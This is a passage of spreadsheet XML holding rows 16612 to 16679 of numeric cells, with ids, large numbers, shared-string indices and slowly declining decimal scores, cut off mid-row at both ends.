      <c r="A16612" s="1">
        <v>21984.0</v>
      </c>
      <c r="B16612" s="2">
        <v>2.9416225E7</v>
      </c>
      <c r="C16612" s="2" t="s">
        <v>16027</v>
      </c>
      <c r="D16612" s="2">
        <v>1.0</v>
      </c>
      <c r="E16612" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16612" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16613" ht="15.75" customHeight="1">
      <c r="A16613" s="1">
        <v>28812.0</v>
      </c>
      <c r="B16613" s="2">
        <v>2.8676689E7</v>
      </c>
      <c r="C16613" s="2" t="s">
        <v>16026</v>
      </c>
      <c r="D16613" s="2">
        <v>1.0</v>
      </c>
      <c r="E16613" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16613" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16614" ht="15.75" customHeight="1">
      <c r="A16614" s="1">
        <v>34103.0</v>
      </c>
      <c r="B16614" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C16614" s="2" t="s">
        <v>16028</v>
      </c>
      <c r="D16614" s="2">
        <v>1.0</v>
      </c>
      <c r="E16614" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16614" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16615" ht="15.75" customHeight="1">
      <c r="A16615" s="1">
        <v>15935.0</v>
      </c>
      <c r="B16615" s="2">
        <v>4.4718848E7</v>
      </c>
      <c r="C16615" s="2" t="s">
        <v>16029</v>
      </c>
      <c r="D16615" s="2">
        <v>1.0</v>
      </c>
      <c r="E16615" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16615" s="2">
        <v>0.1578483245149913</v>
      </c>
    </row>
    <row r="16616" ht="15.75" customHeight="1">
      <c r="A16616" s="1">
        <v>23733.0</v>
      </c>
      <c r="B16616" s="2">
        <v>7287464.0</v>
      </c>
      <c r="C16616" s="2" t="s">
        <v>16030</v>
      </c>
      <c r="D16616" s="2">
        <v>1.0</v>
      </c>
      <c r="E16616" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16616" s="2">
        <v>0.1578483245149913</v>
      </c>
    </row>
    <row r="16617" ht="15.75" customHeight="1">
      <c r="A16617" s="1">
        <v>26824.0</v>
      </c>
      <c r="B16617" s="2">
        <v>1.8846982E7</v>
      </c>
      <c r="C16617" s="2" t="s">
        <v>16031</v>
      </c>
      <c r="D16617" s="2">
        <v>1.0</v>
      </c>
      <c r="E16617" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16617" s="2">
        <v>0.1578483245149913</v>
      </c>
    </row>
    <row r="16618" ht="15.75" customHeight="1">
      <c r="A16618" s="1">
        <v>27693.0</v>
      </c>
      <c r="B16618" s="2">
        <v>2.3011771E7</v>
      </c>
      <c r="C16618" s="2" t="s">
        <v>16032</v>
      </c>
      <c r="D16618" s="2">
        <v>1.0</v>
      </c>
      <c r="E16618" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16618" s="2">
        <v>0.1578483245149913</v>
      </c>
    </row>
    <row r="16619" ht="15.75" customHeight="1">
      <c r="A16619" s="1">
        <v>18352.0</v>
      </c>
      <c r="B16619" s="2">
        <v>5.2486624E7</v>
      </c>
      <c r="C16619" s="2" t="s">
        <v>16033</v>
      </c>
      <c r="D16619" s="2">
        <v>1.0</v>
      </c>
      <c r="E16619" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16619" s="2">
        <v>0.1577380952380953</v>
      </c>
    </row>
    <row r="16620" ht="15.75" customHeight="1">
      <c r="A16620" s="1">
        <v>19107.0</v>
      </c>
      <c r="B16620" s="2">
        <v>5.4734661E7</v>
      </c>
      <c r="C16620" s="2" t="s">
        <v>16034</v>
      </c>
      <c r="D16620" s="2">
        <v>1.0</v>
      </c>
      <c r="E16620" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16620" s="2">
        <v>0.1577380952380953</v>
      </c>
    </row>
    <row r="16621" ht="15.75" customHeight="1">
      <c r="A16621" s="1">
        <v>27932.0</v>
      </c>
      <c r="B16621" s="2">
        <v>2.3787515E7</v>
      </c>
      <c r="C16621" s="2" t="s">
        <v>16035</v>
      </c>
      <c r="D16621" s="2">
        <v>1.0</v>
      </c>
      <c r="E16621" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16621" s="2">
        <v>0.1577380952380953</v>
      </c>
    </row>
    <row r="16622" ht="15.75" customHeight="1">
      <c r="A16622" s="1">
        <v>25578.0</v>
      </c>
      <c r="B16622" s="2">
        <v>1.4334202E7</v>
      </c>
      <c r="C16622" s="2" t="s">
        <v>16036</v>
      </c>
      <c r="D16622" s="2">
        <v>1.0</v>
      </c>
      <c r="E16622" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16622" s="2">
        <v>0.1575591985428051</v>
      </c>
    </row>
    <row r="16623" ht="15.75" customHeight="1">
      <c r="A16623" s="1">
        <v>31702.0</v>
      </c>
      <c r="B16623" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C16623" s="2" t="s">
        <v>16037</v>
      </c>
      <c r="D16623" s="2">
        <v>1.0</v>
      </c>
      <c r="E16623" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16623" s="2">
        <v>0.1575591985428051</v>
      </c>
    </row>
    <row r="16624" ht="15.75" customHeight="1">
      <c r="A16624" s="1">
        <v>23175.0</v>
      </c>
      <c r="B16624" s="2">
        <v>5214024.0</v>
      </c>
      <c r="C16624" s="2" t="s">
        <v>16038</v>
      </c>
      <c r="D16624" s="2">
        <v>1.0</v>
      </c>
      <c r="E16624" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16624" s="2">
        <v>0.1571180555555556</v>
      </c>
    </row>
    <row r="16625" ht="15.75" customHeight="1">
      <c r="A16625" s="1">
        <v>13181.0</v>
      </c>
      <c r="B16625" s="2">
        <v>3.4041417E7</v>
      </c>
      <c r="C16625" s="2" t="s">
        <v>16039</v>
      </c>
      <c r="D16625" s="2">
        <v>1.0</v>
      </c>
      <c r="E16625" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16625" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="16626" ht="15.75" customHeight="1">
      <c r="A16626" s="1">
        <v>32230.0</v>
      </c>
      <c r="B16626" s="2">
        <v>5497001.0</v>
      </c>
      <c r="C16626" s="2" t="s">
        <v>16040</v>
      </c>
      <c r="D16626" s="2">
        <v>1.0</v>
      </c>
      <c r="E16626" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16626" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="16627" ht="15.75" customHeight="1">
      <c r="A16627" s="1">
        <v>25844.0</v>
      </c>
      <c r="B16627" s="2">
        <v>1.4798954E7</v>
      </c>
      <c r="C16627" s="2" t="s">
        <v>16041</v>
      </c>
      <c r="D16627" s="2">
        <v>1.0</v>
      </c>
      <c r="E16627" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16627" s="2">
        <v>0.156810035842294</v>
      </c>
    </row>
    <row r="16628" ht="15.75" customHeight="1">
      <c r="A16628" s="1">
        <v>30910.0</v>
      </c>
      <c r="B16628" s="2">
        <v>4.677977E7</v>
      </c>
      <c r="C16628" s="2" t="s">
        <v>16042</v>
      </c>
      <c r="D16628" s="2">
        <v>1.0</v>
      </c>
      <c r="E16628" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16628" s="2">
        <v>0.156810035842294</v>
      </c>
    </row>
    <row r="16629" ht="15.75" customHeight="1">
      <c r="A16629" s="1">
        <v>31142.0</v>
      </c>
      <c r="B16629" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C16629" s="2" t="s">
        <v>16043</v>
      </c>
      <c r="D16629" s="2">
        <v>1.0</v>
      </c>
      <c r="E16629" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16629" s="2">
        <v>0.1567164179104478</v>
      </c>
    </row>
    <row r="16630" ht="15.75" customHeight="1">
      <c r="A16630" s="1">
        <v>28551.0</v>
      </c>
      <c r="B16630" s="2">
        <v>2.6861579E7</v>
      </c>
      <c r="C16630" s="2" t="s">
        <v>16044</v>
      </c>
      <c r="D16630" s="2">
        <v>1.0</v>
      </c>
      <c r="E16630" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16630" s="2">
        <v>0.1565656565656566</v>
      </c>
    </row>
    <row r="16631" ht="15.75" customHeight="1">
      <c r="A16631" s="1">
        <v>27308.0</v>
      </c>
      <c r="B16631" s="2">
        <v>2.1366761E7</v>
      </c>
      <c r="C16631" s="2" t="s">
        <v>16045</v>
      </c>
      <c r="D16631" s="2">
        <v>1.0</v>
      </c>
      <c r="E16631" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16631" s="2">
        <v>0.1564814814814815</v>
      </c>
    </row>
    <row r="16632" ht="15.75" customHeight="1">
      <c r="A16632" s="1">
        <v>11495.0</v>
      </c>
      <c r="B16632" s="2">
        <v>2.2075284E7</v>
      </c>
      <c r="C16632" s="2" t="s">
        <v>16046</v>
      </c>
      <c r="D16632" s="2">
        <v>1.0</v>
      </c>
      <c r="E16632" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16632" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="16633" ht="15.75" customHeight="1">
      <c r="A16633" s="1">
        <v>18130.0</v>
      </c>
      <c r="B16633" s="2">
        <v>5.1812799E7</v>
      </c>
      <c r="C16633" s="2" t="s">
        <v>16047</v>
      </c>
      <c r="D16633" s="2">
        <v>1.0</v>
      </c>
      <c r="E16633" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16633" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="16634" ht="15.75" customHeight="1">
      <c r="A16634" s="1">
        <v>12335.0</v>
      </c>
      <c r="B16634" s="2">
        <v>2.8574953E7</v>
      </c>
      <c r="C16634" s="2" t="s">
        <v>16048</v>
      </c>
      <c r="D16634" s="2">
        <v>1.0</v>
      </c>
      <c r="E16634" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16634" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="16635" ht="15.75" customHeight="1">
      <c r="A16635" s="1">
        <v>18880.0</v>
      </c>
      <c r="B16635" s="2">
        <v>5.4095731E7</v>
      </c>
      <c r="C16635" s="2" t="s">
        <v>16049</v>
      </c>
      <c r="D16635" s="2">
        <v>1.0</v>
      </c>
      <c r="E16635" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16635" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="16636" ht="15.75" customHeight="1">
      <c r="A16636" s="1">
        <v>20648.0</v>
      </c>
      <c r="B16636" s="2">
        <v>1.4254893E7</v>
      </c>
      <c r="C16636" s="2" t="s">
        <v>16050</v>
      </c>
      <c r="D16636" s="2">
        <v>1.0</v>
      </c>
      <c r="E16636" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16636" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="16637" ht="15.75" customHeight="1">
      <c r="A16637" s="1">
        <v>25661.0</v>
      </c>
      <c r="B16637" s="2">
        <v>1.4523187E7</v>
      </c>
      <c r="C16637" s="2" t="s">
        <v>16051</v>
      </c>
      <c r="D16637" s="2">
        <v>1.0</v>
      </c>
      <c r="E16637" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16637" s="2">
        <v>0.1560846560846562</v>
      </c>
    </row>
    <row r="16638" ht="15.75" customHeight="1">
      <c r="A16638" s="1">
        <v>27713.0</v>
      </c>
      <c r="B16638" s="2">
        <v>2.3059042E7</v>
      </c>
      <c r="C16638" s="2" t="s">
        <v>16002</v>
      </c>
      <c r="D16638" s="2">
        <v>1.0</v>
      </c>
      <c r="E16638" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16638" s="2">
        <v>0.156045751633987</v>
      </c>
    </row>
    <row r="16639" ht="15.75" customHeight="1">
      <c r="A16639" s="1">
        <v>19291.0</v>
      </c>
      <c r="B16639" s="2">
        <v>5.5180719E7</v>
      </c>
      <c r="C16639" s="2" t="s">
        <v>16052</v>
      </c>
      <c r="D16639" s="2">
        <v>1.0</v>
      </c>
      <c r="E16639" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16639" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="16640" ht="15.75" customHeight="1">
      <c r="A16640" s="1">
        <v>16280.0</v>
      </c>
      <c r="B16640" s="2">
        <v>4.5796131E7</v>
      </c>
      <c r="C16640" s="2" t="s">
        <v>16053</v>
      </c>
      <c r="D16640" s="2">
        <v>1.0</v>
      </c>
      <c r="E16640" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16640" s="2">
        <v>0.1557377049180328</v>
      </c>
    </row>
    <row r="16641" ht="15.75" customHeight="1">
      <c r="A16641" s="1">
        <v>31728.0</v>
      </c>
      <c r="B16641" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C16641" s="2" t="s">
        <v>16054</v>
      </c>
      <c r="D16641" s="2">
        <v>1.0</v>
      </c>
      <c r="E16641" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16641" s="2">
        <v>0.1553819444444445</v>
      </c>
    </row>
    <row r="16642" ht="15.75" customHeight="1">
      <c r="A16642" s="1">
        <v>10472.0</v>
      </c>
      <c r="B16642" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C16642" s="2" t="s">
        <v>16055</v>
      </c>
      <c r="D16642" s="2">
        <v>1.0</v>
      </c>
      <c r="E16642" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16642" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16643" ht="15.75" customHeight="1">
      <c r="A16643" s="1">
        <v>10719.0</v>
      </c>
      <c r="B16643" s="2">
        <v>1.5074304E7</v>
      </c>
      <c r="C16643" s="2" t="s">
        <v>16056</v>
      </c>
      <c r="D16643" s="2">
        <v>1.0</v>
      </c>
      <c r="E16643" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16643" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16644" ht="15.75" customHeight="1">
      <c r="A16644" s="1">
        <v>19490.0</v>
      </c>
      <c r="B16644" s="2">
        <v>5.5858545E7</v>
      </c>
      <c r="C16644" s="2" t="s">
        <v>16057</v>
      </c>
      <c r="D16644" s="2">
        <v>1.0</v>
      </c>
      <c r="E16644" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16644" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16645" ht="15.75" customHeight="1">
      <c r="A16645" s="1">
        <v>22645.0</v>
      </c>
      <c r="B16645" s="2">
        <v>4.0773729E7</v>
      </c>
      <c r="C16645" s="2" t="s">
        <v>16058</v>
      </c>
      <c r="D16645" s="2">
        <v>1.0</v>
      </c>
      <c r="E16645" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16645" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16646" ht="15.75" customHeight="1">
      <c r="A16646" s="1">
        <v>22841.0</v>
      </c>
      <c r="B16646" s="2">
        <v>4.6619622E7</v>
      </c>
      <c r="C16646" s="2" t="s">
        <v>16059</v>
      </c>
      <c r="D16646" s="2">
        <v>1.0</v>
      </c>
      <c r="E16646" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16646" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16647" ht="15.75" customHeight="1">
      <c r="A16647" s="1">
        <v>23349.0</v>
      </c>
      <c r="B16647" s="2">
        <v>5.484088E7</v>
      </c>
      <c r="C16647" s="2" t="s">
        <v>16060</v>
      </c>
      <c r="D16647" s="2">
        <v>1.0</v>
      </c>
      <c r="E16647" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16647" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16648" ht="15.75" customHeight="1">
      <c r="A16648" s="1">
        <v>28393.0</v>
      </c>
      <c r="B16648" s="2">
        <v>2.6223288E7</v>
      </c>
      <c r="C16648" s="2" t="s">
        <v>16061</v>
      </c>
      <c r="D16648" s="2">
        <v>1.0</v>
      </c>
      <c r="E16648" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16648" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16649" ht="15.75" customHeight="1">
      <c r="A16649" s="1">
        <v>29116.0</v>
      </c>
      <c r="B16649" s="2">
        <v>3.0434117E7</v>
      </c>
      <c r="C16649" s="2" t="s">
        <v>16062</v>
      </c>
      <c r="D16649" s="2">
        <v>1.0</v>
      </c>
      <c r="E16649" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16649" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16650" ht="15.75" customHeight="1">
      <c r="A16650" s="1">
        <v>29198.0</v>
      </c>
      <c r="B16650" s="2">
        <v>3.0761876E7</v>
      </c>
      <c r="C16650" s="2" t="s">
        <v>16063</v>
      </c>
      <c r="D16650" s="2">
        <v>1.0</v>
      </c>
      <c r="E16650" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16650" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16651" ht="15.75" customHeight="1">
      <c r="A16651" s="1">
        <v>29327.0</v>
      </c>
      <c r="B16651" s="2">
        <v>3.1314271E7</v>
      </c>
      <c r="C16651" s="2" t="s">
        <v>16064</v>
      </c>
      <c r="D16651" s="2">
        <v>1.0</v>
      </c>
      <c r="E16651" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16651" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16652" ht="15.75" customHeight="1">
      <c r="A16652" s="1">
        <v>30390.0</v>
      </c>
      <c r="B16652" s="2">
        <v>3.8610371E7</v>
      </c>
      <c r="C16652" s="2" t="s">
        <v>16065</v>
      </c>
      <c r="D16652" s="2">
        <v>1.0</v>
      </c>
      <c r="E16652" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16652" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16653" ht="15.75" customHeight="1">
      <c r="A16653" s="1">
        <v>31577.0</v>
      </c>
      <c r="B16653" s="2">
        <v>5126925.0</v>
      </c>
      <c r="C16653" s="2" t="s">
        <v>16066</v>
      </c>
      <c r="D16653" s="2">
        <v>1.0</v>
      </c>
      <c r="E16653" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16653" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="16654" ht="15.75" customHeight="1">
      <c r="A16654" s="1">
        <v>26120.0</v>
      </c>
      <c r="B16654" s="2">
        <v>1.5904009E7</v>
      </c>
      <c r="C16654" s="2" t="s">
        <v>16067</v>
      </c>
      <c r="D16654" s="2">
        <v>1.0</v>
      </c>
      <c r="E16654" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16654" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="16655" ht="15.75" customHeight="1">
      <c r="A16655" s="1">
        <v>33231.0</v>
      </c>
      <c r="B16655" s="2">
        <v>7287463.0</v>
      </c>
      <c r="C16655" s="2" t="s">
        <v>16068</v>
      </c>
      <c r="D16655" s="2">
        <v>1.0</v>
      </c>
      <c r="E16655" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16655" s="2">
        <v>0.1543209876543211</v>
      </c>
    </row>
    <row r="16656" ht="15.75" customHeight="1">
      <c r="A16656" s="1">
        <v>24487.0</v>
      </c>
      <c r="B16656" s="2">
        <v>1.1067246E7</v>
      </c>
      <c r="C16656" s="2" t="s">
        <v>16069</v>
      </c>
      <c r="D16656" s="2">
        <v>1.0</v>
      </c>
      <c r="E16656" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16656" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="16657" ht="15.75" customHeight="1">
      <c r="A16657" s="1">
        <v>27922.0</v>
      </c>
      <c r="B16657" s="2">
        <v>2.3764274E7</v>
      </c>
      <c r="C16657" s="2" t="s">
        <v>16070</v>
      </c>
      <c r="D16657" s="2">
        <v>1.0</v>
      </c>
      <c r="E16657" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16657" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="16658" ht="15.75" customHeight="1">
      <c r="A16658" s="1">
        <v>31241.0</v>
      </c>
      <c r="B16658" s="2">
        <v>4.928977E7</v>
      </c>
      <c r="C16658" s="2" t="s">
        <v>16071</v>
      </c>
      <c r="D16658" s="2">
        <v>1.0</v>
      </c>
      <c r="E16658" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16658" s="2">
        <v>0.1541471048513302</v>
      </c>
    </row>
    <row r="16659" ht="15.75" customHeight="1">
      <c r="A16659" s="1">
        <v>8282.0</v>
      </c>
      <c r="B16659" s="2">
        <v>5.347833E7</v>
      </c>
      <c r="C16659" s="2" t="s">
        <v>16072</v>
      </c>
      <c r="D16659" s="2">
        <v>1.0</v>
      </c>
      <c r="E16659" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16659" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="16660" ht="15.75" customHeight="1">
      <c r="A16660" s="1">
        <v>12836.0</v>
      </c>
      <c r="B16660" s="2">
        <v>3.1677536E7</v>
      </c>
      <c r="C16660" s="2" t="s">
        <v>16073</v>
      </c>
      <c r="D16660" s="2">
        <v>1.0</v>
      </c>
      <c r="E16660" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16660" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="16661" ht="15.75" customHeight="1">
      <c r="A16661" s="1">
        <v>14040.0</v>
      </c>
      <c r="B16661" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C16661" s="2" t="s">
        <v>16074</v>
      </c>
      <c r="D16661" s="2">
        <v>1.0</v>
      </c>
      <c r="E16661" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16661" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="16662" ht="15.75" customHeight="1">
      <c r="A16662" s="1">
        <v>31928.0</v>
      </c>
      <c r="B16662" s="2">
        <v>5.3051021E7</v>
      </c>
      <c r="C16662" s="2" t="s">
        <v>16075</v>
      </c>
      <c r="D16662" s="2">
        <v>1.0</v>
      </c>
      <c r="E16662" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16662" s="2">
        <v>0.1537842190016104</v>
      </c>
    </row>
    <row r="16663" ht="15.75" customHeight="1">
      <c r="A16663" s="1">
        <v>22445.0</v>
      </c>
      <c r="B16663" s="2">
        <v>3625091.0</v>
      </c>
      <c r="C16663" s="2" t="s">
        <v>16076</v>
      </c>
      <c r="D16663" s="2">
        <v>1.0</v>
      </c>
      <c r="E16663" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16663" s="2">
        <v>0.1537698412698413</v>
      </c>
    </row>
    <row r="16664" ht="15.75" customHeight="1">
      <c r="A16664" s="1">
        <v>27931.0</v>
      </c>
      <c r="B16664" s="2">
        <v>2.3787358E7</v>
      </c>
      <c r="C16664" s="2" t="s">
        <v>16077</v>
      </c>
      <c r="D16664" s="2">
        <v>1.0</v>
      </c>
      <c r="E16664" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16664" s="2">
        <v>0.1537698412698413</v>
      </c>
    </row>
    <row r="16665" ht="15.75" customHeight="1">
      <c r="A16665" s="1">
        <v>29330.0</v>
      </c>
      <c r="B16665" s="2">
        <v>3.1319521E7</v>
      </c>
      <c r="C16665" s="2" t="s">
        <v>16078</v>
      </c>
      <c r="D16665" s="2">
        <v>1.0</v>
      </c>
      <c r="E16665" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16665" s="2">
        <v>0.1535493827160495</v>
      </c>
    </row>
    <row r="16666" ht="15.75" customHeight="1">
      <c r="A16666" s="1">
        <v>30292.0</v>
      </c>
      <c r="B16666" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C16666" s="2" t="s">
        <v>16079</v>
      </c>
      <c r="D16666" s="2">
        <v>1.0</v>
      </c>
      <c r="E16666" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16666" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="16667" ht="15.75" customHeight="1">
      <c r="A16667" s="1">
        <v>32036.0</v>
      </c>
      <c r="B16667" s="2">
        <v>5365160.0</v>
      </c>
      <c r="C16667" s="2" t="s">
        <v>16080</v>
      </c>
      <c r="D16667" s="2">
        <v>1.0</v>
      </c>
      <c r="E16667" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16667" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="16668" ht="15.75" customHeight="1">
      <c r="A16668" s="1">
        <v>13205.0</v>
      </c>
      <c r="B16668" s="2">
        <v>3.4138905E7</v>
      </c>
      <c r="C16668" s="2" t="s">
        <v>16081</v>
      </c>
      <c r="D16668" s="2">
        <v>1.0</v>
      </c>
      <c r="E16668" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16668" s="2">
        <v>0.1531746031746032</v>
      </c>
    </row>
    <row r="16669" ht="15.75" customHeight="1">
      <c r="A16669" s="1">
        <v>30061.0</v>
      </c>
      <c r="B16669" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C16669" s="2" t="s">
        <v>16082</v>
      </c>
      <c r="D16669" s="2">
        <v>1.0</v>
      </c>
      <c r="E16669" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16669" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="16670" ht="15.75" customHeight="1">
      <c r="A16670" s="1">
        <v>3880.0</v>
      </c>
      <c r="B16670" s="2">
        <v>4.0356792E7</v>
      </c>
      <c r="C16670" s="2" t="s">
        <v>16083</v>
      </c>
      <c r="D16670" s="2">
        <v>1.0</v>
      </c>
      <c r="E16670" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16670" s="2">
        <v>0.1529680365296804</v>
      </c>
    </row>
    <row r="16671" ht="15.75" customHeight="1">
      <c r="A16671" s="1">
        <v>6400.0</v>
      </c>
      <c r="B16671" s="2">
        <v>4.8474948E7</v>
      </c>
      <c r="C16671" s="2" t="s">
        <v>16084</v>
      </c>
      <c r="D16671" s="2">
        <v>1.0</v>
      </c>
      <c r="E16671" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16671" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16672" ht="15.75" customHeight="1">
      <c r="A16672" s="1">
        <v>21521.0</v>
      </c>
      <c r="B16672" s="2">
        <v>2.3292209E7</v>
      </c>
      <c r="C16672" s="2" t="s">
        <v>16085</v>
      </c>
      <c r="D16672" s="2">
        <v>1.0</v>
      </c>
      <c r="E16672" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16672" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16673" ht="15.75" customHeight="1">
      <c r="A16673" s="1">
        <v>22276.0</v>
      </c>
      <c r="B16673" s="2">
        <v>3.3251887E7</v>
      </c>
      <c r="C16673" s="2" t="s">
        <v>16086</v>
      </c>
      <c r="D16673" s="2">
        <v>1.0</v>
      </c>
      <c r="E16673" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16673" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16674" ht="15.75" customHeight="1">
      <c r="A16674" s="1">
        <v>23586.0</v>
      </c>
      <c r="B16674" s="2">
        <v>6280079.0</v>
      </c>
      <c r="C16674" s="2" t="s">
        <v>16087</v>
      </c>
      <c r="D16674" s="2">
        <v>1.0</v>
      </c>
      <c r="E16674" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16674" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16675" ht="15.75" customHeight="1">
      <c r="A16675" s="1">
        <v>24099.0</v>
      </c>
      <c r="B16675" s="2">
        <v>9847109.0</v>
      </c>
      <c r="C16675" s="2" t="s">
        <v>16088</v>
      </c>
      <c r="D16675" s="2">
        <v>1.0</v>
      </c>
      <c r="E16675" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16675" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16676" ht="15.75" customHeight="1">
      <c r="A16676" s="1">
        <v>25161.0</v>
      </c>
      <c r="B16676" s="2">
        <v>1.3074844E7</v>
      </c>
      <c r="C16676" s="2" t="s">
        <v>16089</v>
      </c>
      <c r="D16676" s="2">
        <v>1.0</v>
      </c>
      <c r="E16676" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16676" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16677" ht="15.75" customHeight="1">
      <c r="A16677" s="1">
        <v>25833.0</v>
      </c>
      <c r="B16677" s="2">
        <v>1.4778698E7</v>
      </c>
      <c r="C16677" s="2" t="s">
        <v>16087</v>
      </c>
      <c r="D16677" s="2">
        <v>1.0</v>
      </c>
      <c r="E16677" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16677" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16678" ht="15.75" customHeight="1">
      <c r="A16678" s="1">
        <v>28575.0</v>
      </c>
      <c r="B16678" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C16678" s="2" t="s">
        <v>16090</v>
      </c>
      <c r="D16678" s="2">
        <v>1.0</v>
      </c>
      <c r="E16678" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16678" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="16679" ht="15.75" customHeight="1">
      <c r="A16679" s="1">
